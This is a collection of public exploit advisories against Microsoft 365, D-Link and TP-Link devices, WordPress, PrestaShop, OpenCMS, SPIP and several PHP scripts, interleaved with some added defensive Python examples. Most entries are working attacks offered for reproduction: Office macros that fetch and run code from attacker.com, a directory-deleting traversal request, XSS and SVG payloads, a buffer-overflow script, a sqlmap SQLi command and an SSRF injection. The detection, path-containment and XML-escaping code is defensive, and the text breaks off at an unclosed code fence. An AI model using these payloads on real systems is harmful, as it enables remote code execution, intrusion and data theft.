attack on the victim's computer. The attacker can trick the victim into
opening a malicious web page by using a malicious `Word` file for the
`Office-365 API`. After the user opens the file to read it, the
Office-365 API, without asking what it wants to activate, will run the
code of the malicious server, which the attacker injects himself from
that malicious server. Immediately after this click, the attacker can
receive very sensitive information: bank accounts, logs from sniffing
attacks, continuous tracking of all the victim's traffic, and more
malicious things, depending on the scenario.
STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hits the button of the exploit!

[+]PoC:
```vba
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spent:
01:30:00
            
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137


## Description:
This exploit is connected to a third-party exploit server, which waits
for the victim to call it and then executes the content from it using the
pipe-posting method! This is absolutely a 0-day exploit! It is
absolutely dangerous for the victims who are infected by it!
When the victim hits the button in the Excel file, it makes a POST
request to the exploit server, and the server responds this way: it
creates another hidden malicious file and executes it directly on the
victim's machine, then everything disappears, so nasty.

STATUS: HIGH Vulnerability. WARNING: THIS IS VERY DANGEROUS for ordinary users!

[+]Exploit:
```vba
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)

## Time spent:
01:27:00
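Both advisories above produce the same observable on the endpoint: an Office process spawning cmd.exe whose command line fetches something with curl and immediately runs it. The following added detection (my example, not nu11secur1ty's code) applies that rule to constructed Sysmon-style process-creation records; the field names are an assumption, not any product's exact schema.

```python
"""Flag an Office application spawning a shell that downloads and runs content.

Added example for the two Microsoft 365 advisories above (CVE-2023-28285 and
CVE-2023-33137); it is not nu11secur1ty's code. The records below are
constructed, Sysmon Event ID 1-style dictionaries; the field names are an
assumption, not any product's exact schema.
"""
import re
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# No leading \b: the macros in both advisories concatenate "/c" and "curl" into
# "/ccurl", so a word-boundary anchor would miss exactly the string they produce.
DOWNLOADER_RE = re.compile(r"(curl|wget|certutil|bitsadmin|invoke-webrequest|iwr)\b", re.I)
# The download is handed straight to something that runs it: a pipe, a redirect
# into a script followed by a command chain, or a local .bat/.cmd invocation.
EXEC_CHAIN_RE = re.compile(
    r"(\|\s*\S+|>\s*\S+\.(bat|cmd|exe|ps1|vbs)\b.*&&|\.\\\S+\.(bat|cmd)\b)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason label when the event is suspicious, else None."""
    if basename(event.get("ParentImage", "")) not in OFFICE_PARENTS:
        return None
    if basename(event.get("Image", "")) not in SHELLS:
        return None  # print helpers and similar are normal Office children
    cmdline = event.get("CommandLine", "")
    reasons = []
    if DOWNLOADER_RE.search(cmdline):
        reasons.append("downloader")
    if EXEC_CHAIN_RE.search(cmdline):
        reasons.append("execute-download")
    return "office-shell-" + "+".join(reasons) if reasons else "office-spawned-shell"


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(ProcessGuid, reason) for every event that classify() flags."""
    return [(ev["ProcessGuid"], r) for ev in events if (r := classify(ev))]


# Constructed telemetry: two macro-launched shells and two benign records.
SAMPLE_EVENTS = [
    {"ProcessGuid": "p1", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /S /ccurl -s http://attacker.example/PoC.debelui | debelui"},
    {"ProcessGuid": "p2", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /S /ccurl -s https://attacker.example/m.bat > m.bat && .\m.bat"},
    {"ProcessGuid": "p3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl -s https://intranet.example/status"},
    {"ProcessGuid": "p4", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for guid, reason in detect(SAMPLE_EVENTS):
        print(guid, reason)
```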
            
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on: All Platforms


1) Description

This is the security vulnerability known as "unauthenticated access to settings" or "unauthenticated configuration download". It occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Append the payload to the URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Exploit script:
https://github.com/eeduardogoncalves/exploit
            
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
=======================================

Arbitrary directory deletion

GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
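As an added example (not WebsiteBaker's code), the following shows the containment check that delete.php lacks: the user-supplied dir value is canonicalised and rejected unless it stays strictly inside the media root. The media root and the request values are constructed.

```python
"""Reject media-manager directory parameters that escape the media root.

Added example for the WebsiteBaker delete.php advisory above; it is not the
project's code. The media root and the request inputs are constructed.
"""
import shutil
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when a user-supplied directory resolves outside the media root."""


def resolve_media_dir(media_root: str, user_dir: str) -> Path:
    """Map a request's ``dir`` value to a directory strictly inside media_root.

    The bug class in the advisory is the naive join: a value such as
    ``/../../../../../..//var/www`` walks out of the media tree, and the
    delete that follows removes an arbitrary directory.
    """
    root = Path(media_root).resolve()
    # Strip a leading slash so an absolute-looking value cannot replace the
    # root outright (joining "/srv/media" with "/var/www" yields "/var/www").
    candidate = (root / user_dir.lstrip("/\\")).resolve()
    # resolve() collapses ".." and follows symlinks; comparing the canonical
    # prefix is what actually guarantees containment.
    if root != candidate and root not in candidate.parents:
        raise UnsafePath(f"directory escapes media root: {user_dir!r}")
    if candidate == root:
        raise UnsafePath("refusing to operate on the media root itself")
    return candidate


def delete_media_dir(media_root: str, user_dir: str) -> bool:
    """Hardened delete: only removes a directory resolve_media_dir accepts."""
    target = resolve_media_dir(media_root, user_dir)
    if not target.is_dir():
        return False
    shutil.rmtree(target)
    return True


def demo() -> dict:
    """Build a throwaway tree and exercise the check; nothing outside it is touched."""
    base = Path(tempfile.mkdtemp())
    media = base / "media"
    (media / "uploads").mkdir(parents=True)
    outside = base / "var" / "www"          # stands in for the real /var/www
    outside.mkdir(parents=True)
    results = {}
    try:  # the advisory's exact value; resolve_media_dir only computes, never deletes
        resolve_media_dir(str(media), "/../../../../../..//var/www")
        results["advisory_value_blocked"] = False
    except UnsafePath:
        results["advisory_value_blocked"] = True
    try:  # two ".." reach the stand-in sibling directory from the media root
        delete_media_dir(str(media), "/../var/www")
        results["sibling_delete_blocked"] = False
    except UnsafePath:
        results["sibling_delete_blocked"] = True
    results["outside_intact"] = outside.is_dir()
    results["legit_deleted"] = delete_media_dir(str(media), "uploads") and not (media / "uploads").exists()
    shutil.rmtree(base)
    return results


if __name__ == "__main__":
    print(demo())
```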
            
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
# Date: 29/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Release Notes:

Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.



## Stored XSS

-----------------------------------------------
POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1

promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User], choose any day colored green on the calendar - click on [+] near Start/End Time - press [Booking]
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"


7. Accept the terms & press [Booking]
   XSS fires in the local user's browser

8. When the ADMIN visits [Dashboard] in the Administration Panel on this path (https://website/index.php?controller=GzAdmin&action=dashboard)
   the XSS will fire and execute in his browser

9. When the ADMIN visits [Bookings] - [All Booking] to check [Pending Booking] on this path (https://website/index.php?controller=GzBooking&action=index)
   the XSS will fire and execute in his browser

10. When the ADMIN visits [Invoices] - [All Invoices] to check [Pending Invoices] on this path (https://website/index.php?controller=GzInvoice&action=index)
   the XSS will fire and execute in his browser


[-] Done
            
## Exploit Title: spip v4.1.10 - Spoofing Admin account 
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
A malicious user can upload a malicious SVG file that is not
filtered by any security function, and can then trick
the administrator of the system into checking his logo by clicking on it
and visiting a potentially very dangerous URL.
Wrong web application logic, and an upload function that does not sanitize well.

STATUS: HIGH Vulnerability

[+]Exploit:
```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <defs>
       <linearGradient id="badgeGradient">
         <stop offset="0"/>
         <stop offset="1"/>
       </linearGradient>
     </defs>

     <g id="heading">
       <a xlink:href= "https://rb.gy/74f0y">
         <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
         <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
         <text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
       </a>
     </g>

   </svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)

## Time spent:
00:37:00
            
# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Stored XSS

------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1

property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------

POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS

## Steps to Reproduce:

1. Surf (as Guest) - Go to any Listed Property
2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS Fired on Local Browser
8. XSS will fire & execute in visitors' browsers when they visit the page of the property you [injected] the XSS payloads into, & the XSS will also fire on the [Reviews Page]
Note: I think the Administration Panel is missing a section to manage [Reviews] on the website;
this feature must be added in the next updates [View/Edit/Delete]
            
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')
            
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux

---------------------------------------


The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users,
leading to an unauthenticated SQL injection.

--------------------------------------

How to Reproduce this Vulnerability:

1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 uses the q parameter for AJAX requests
3. Find requests belonging to WP AutoComplete, like the one in step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
            
# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/gz-forum-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Release Notes:

Reflected XSS:

An attacker can send the victim a link containing a malicious URL in an email or
instant message and perform a wide variety of actions, such as stealing the victim's
session token or login credentials.

Stored XSS:
Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.

## Reflected XSS
Path: /preview.php

GET 'catid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a


Path: /preview.php

GET 'topicid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS
-----------------------------------------------
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325--

-----------------------------------------------

POST parameter 'free_name' is vulnerable to XSS
POST parameter 'topic' is vulnerable to XSS
POST parameter 'topic_message' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User], click on [New Topic] to create a "New Topic" on this path (http://website/preview.php?controller=Load&action=start_new_topic)
2. Inject your [XSS Payload] in "Name"
3. Inject your [XSS Payload] in "Topic Title"
4. Inject your [XSS Payload] in "Topic Message"
5. Submit

6. XSS fires in visitors' browsers when they visit the topic you injected your [XSS Payload] into

7. XSS fires in the ADMIN's browser when he visits [Dashboard] in the Administration Panel on this path (https://website/GzAdmin/dashboard)
8. XSS fires in the ADMIN's browser when he visits [Topic] & [All Topics] to check [New Topics] on this path (https://website/GzTopic/index)
            
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps:

1. Go to Catalog => Products
2. Select an arbitrary product
3. Upload the malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:

POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=[removed]; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=[removed]
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
            
# Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
# Application: PodcastGenerator
# Version: v3.2.9
# Bugs: Blind SSRF via XML Injection
# Technology: PHP
# Vendor URL: https://podcastgenerator.net/
# Software Link: https://github.com/PodcastGenerator/PodcastGenerator
# Date found: 01-07-2023
# Author: Mirabbas Ağalarov
# Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill in all sections and set the Short Description section to 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'

payload:  test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test

By the way, I used localhost. If you have a domain, you can use the domain.

3. And upload the episode

4. I am listening on port 3132 because I'm watching for incoming requests

nc -lvp 3132

5. And I receive the request

request:

POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
Content-Type: image/jpeg

image content blaaahblahasdfjblaaah;sdfblaaahasdf
asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="shortdesc"

test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="date"

2023-07-01
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="time"

17:02
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="longdesc"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodenum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="seasonnum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="token"

vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
------WebKitFormBoundarypRUTcUa48pmEcI6Q--
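As an added example, not the project's code, the following rebuilds the kind of XML the advisory's Short Description payload breaks out of, then shows two fixes: splitting every `]]>` inside the CDATA section, and letting an XML serializer escape the text. The element names follow the payload; the wrapping `<episode>` element is an assumption.

```python
"""Why the Short Description injection works, and two ways to build the XML safely.

Added example for the PodcastGenerator advisory above; it is not the
project's code. The element names (shortdescPG, imgPG) follow the
advisory's payload; the wrapping <episode> element is an assumption.
"""
import xml.etree.ElementTree as ET
from typing import List

# The advisory's Short Description value.
PAYLOAD = ('test]]></shortdescPG><imgPG path="">http://localhost:3132'
           '</imgPG><shortdescPG><![CDATA[test')


def build_naive(shortdesc: str) -> str:
    """String-templated XML: the CDATA section ends wherever the user writes ']]>'."""
    return f"<episode><shortdescPG><![CDATA[{shortdesc}]]></shortdescPG></episode>"


def cdata_escape(text: str) -> str:
    """Split every ']]>' so user text can never terminate the CDATA section early."""
    return text.replace("]]>", "]]]]><![CDATA[>")


def build_cdata_split(shortdesc: str) -> str:
    """Same template as build_naive, with the one sequence that matters neutralised."""
    return f"<episode><shortdescPG><![CDATA[{cdata_escape(shortdesc)}]]></shortdescPG></episode>"


def build_serialized(shortdesc: str) -> str:
    """Let the XML library escape the text; no CDATA needed at all."""
    episode = ET.Element("episode")
    ET.SubElement(episode, "shortdescPG").text = shortdesc
    return ET.tostring(episode, encoding="unicode")


def image_urls(xml_text: str) -> List[str]:
    """What a feed consumer would go and fetch: the text of every imgPG element.

    Any attacker-controlled entry here is the blind SSRF in the advisory.
    """
    return [el.text or "" for el in ET.fromstring(xml_text).iter("imgPG")]


def short_descriptions(xml_text: str) -> List[str]:
    """Text of every shortdescPG element; the safe builders yield exactly one."""
    return [el.text or "" for el in ET.fromstring(xml_text).iter("shortdescPG")]


if __name__ == "__main__":
    for builder in (build_naive, build_cdata_split, build_serialized):
        doc = builder(PAYLOAD)
        print(f"{builder.__name__:18} imgPG={image_urls(doc)} shortdescPG={short_descriptions(doc)}")
```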
            
# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Date: 1/07/2023
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: v15.0


POC:

1 ) Log in on the demo page, then go to this URL
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
2 ) Click /.galleries/, then right-click any png file, open the gallery, and write this payload in the search box
<img src=. onerror=alert(document.domain)>
3 ) You will see an alert box

POC:

1 ) Go to this URL, right-click any png file, rename the title section and write your payload :  <img src=. onerror=alert(document.domain)>
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
2 ) You will see an alert box, stored xss

POC:

1 ) Go to this URL, right-click any png file and choose replace, click change file and choose your svg file,
then save it

svg file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

2 ) When you click this svg file you will see an alert box
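The SPIP, PrestaShop and OpenCMS advisories above all hinge on an SVG upload being accepted unfiltered. The following added validator (my example, not code from any of those projects) rejects an SVG that carries script, event-handler attributes, external links or a DOCTYPE; the sample documents are constructed to mirror the three payloads.

```python
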